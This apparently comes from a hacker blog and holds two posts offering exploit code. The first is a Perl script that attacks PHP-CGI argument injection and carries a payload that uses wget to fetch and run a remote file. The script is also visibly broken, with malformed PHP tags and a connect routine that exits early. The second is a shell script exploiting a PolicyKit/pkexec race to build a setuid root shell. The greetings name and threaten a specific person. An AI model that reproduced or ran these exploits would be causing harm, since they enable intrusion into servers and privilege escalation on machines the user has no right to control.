Help pay for xds lawyer fees.
LR

[Exploit]: PHP CGI exec-cmd/injection of php-code thru phptags by (xd) PERL CODE

Posted on 6th May 2012 in Codes, Exploits, Papers, Uncategorized

Done this, but, this is only a basic version wich, i guess does things in a nice way :)

it is my 3rd perl exploit , so pls dont bash me, any fixes etc would be appreciated BUT remember it is using the RIGHT method, ie: injecting php by shellexec()

wich IS a PHP CGI function, and the ONLY way it Will definately exec!

Ok now on with the show….


#!/usr/bin/perl
 ## PHP CGI exec-cmd/injection of code thru php tags by (xd)

###Greetz: My channel on efnet / #Haxnet , ppl @ps in it

###greetz#1: tropic,dolphin,galaxy,Mouse_,MeOwie,nme,Meta,roy-ITUG

###and pt.2: FUZi0N,Motd/AlbaHack,Serh/RoHack,l3th4l/smashthestack.org,gizmore/wechall.net (Best 2 wargames around!)

###and pt3: storm, ev0, insid, worldwide (yea my juped nick thx to a fbi infomant named: krashed ,but ya'll know tht ;;))

###and pt 4: fuckwitz , zeu ,and hell, i cant rmember ya all but, you know who ya are, the ppl who contribute and help.. i <3 yas..

###Crews: AB (My mentors,inspirators.. <3) , Br Hackers and the BR AnonOps/Antisec team,AlbaHack,RoHack,DARPA (still love most of yas BUT ONE!) <3 peanuter ..comeback br0)

### MAJOR fuckage to ONLY one: krashed / [krashed] - motherfucker, YOUR TIME is come!!!!
use IO::Socket;
use Socket;

if (@ARGV<2) {
print "Usage:\n";
print "$0 <Host> <Cmd [Ex: id]>\n";
exit(-1);
}
my $payload = "<php? shellexec(wget -q http://fbi.gov/0day.txt;chmod +x 0day.txt;perl -e 0day.txt); ?>";

my $host=$ARGV[0];
my $cmd=$ARGV[1];
my($host, $cmd) = @ARGV or usage();

sub Connect {
print "[+] Connecting ..\n";
$sock = IO::Socket::INET->new(Proto => "tcp", PeerAddr => "$host", PeerPort => "80") || die "[-] Connect Error ..\n";
exit(-1);
}

$cmd = "POST http://". $host ."//cgi-bin/?-d%20allow_url_include%3DOn+-d%20auto_prepend_file%3D". $payload ." HTTP/1.1\r\n";
print $sock "Host: $host\n";
print $sock "Accept: */*\n";
print $sock "\n\n";

while () {
$rp = rand;
&Connect;
print "[+] Executing command payload thru php-shellexec: ( $cmd ) ..\n";
my $answer=0;
print $sock;
if ($sock) {
print "[+] Sent evilcode,running: ( $cmd ) ..\n";
while ($answer=<$sock>) {
print $answer;
print results "[*] Server reply: ( $answer ) ..\n";
}
}
}

 

Enjoy / xd–

comments: 0 » tags: , , , , , , , , ,

PolicyKit Pwnage PROPER root exploit based on zx2c4 code, very nice working version made by Admin

Posted on 10th November 2011 in Codes, Exploits

Enjoy, but, i advise to simply, use the c binary if u have it compiled.. or just modify this alittle to suit needs… this works on Ubuntu 10.04.4 (latest stable anyhow)… on 3.0.4 kernel, is NOT 0day atall, but somany fakes, i guess i decided to close this one, next I will do is bzip2, or rather, have DONE but, i might hangon to it..as, if you lookin to that src, it goes VERYYYYY far… (Almost every distro affected!!)…
Anyhow this is polkit.sh :

#!/bin/sh
## policykit-pwnage.c -> to -> bash version -> polkit.sh by xd-- / #HaxNET@EFNet
cd /media/
cat > su.c << EOF
#include <unistd.h>
#include <stdio.h>
#include <fcntl.h>

void __attribute__((constructor)) init() {
char *a[] = {"/bin/sh -c ", NULL};
setuid(0);
setgid(0);
execve(*a, a, NULL);
}
EOF
cat > makesu.c << _EOF
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <sys/types.h>
#include <sys/inotify.h>

int main(int argc, char **argv) {
if (fork() != 0) {
int fd;
char pid_path[1025];
sprintf(pid_path, "/proc/%i", getpid());
close(0);
close(1);
close(2);
fd = inotify_init();
inotify_add_watch(fd, pid_path, IN_ACCESS);
read(fd, NULL, 0);
execl("/usr/bin/chsh", "chsh", NULL);
} else {
sleep(2);
execl("/usr/bin/pkexec", "pkexec", "/bin/sh", NULL);
}
return 0;
}
_EOF
gcc -o su su.c
gcc -o makesu makesu.c
./makesu chown root:root su
./makesu chmod u+s su
echo "-> Your suid shell is on /media/su make sure ya move this!"
/media/./su -c /bin/sh
/media/su -c /bin/sh
su
whoami

Thats all for now.. i doubt ill publish the bzip :P ~~
laterz.
xd–

comments: 10 » tags: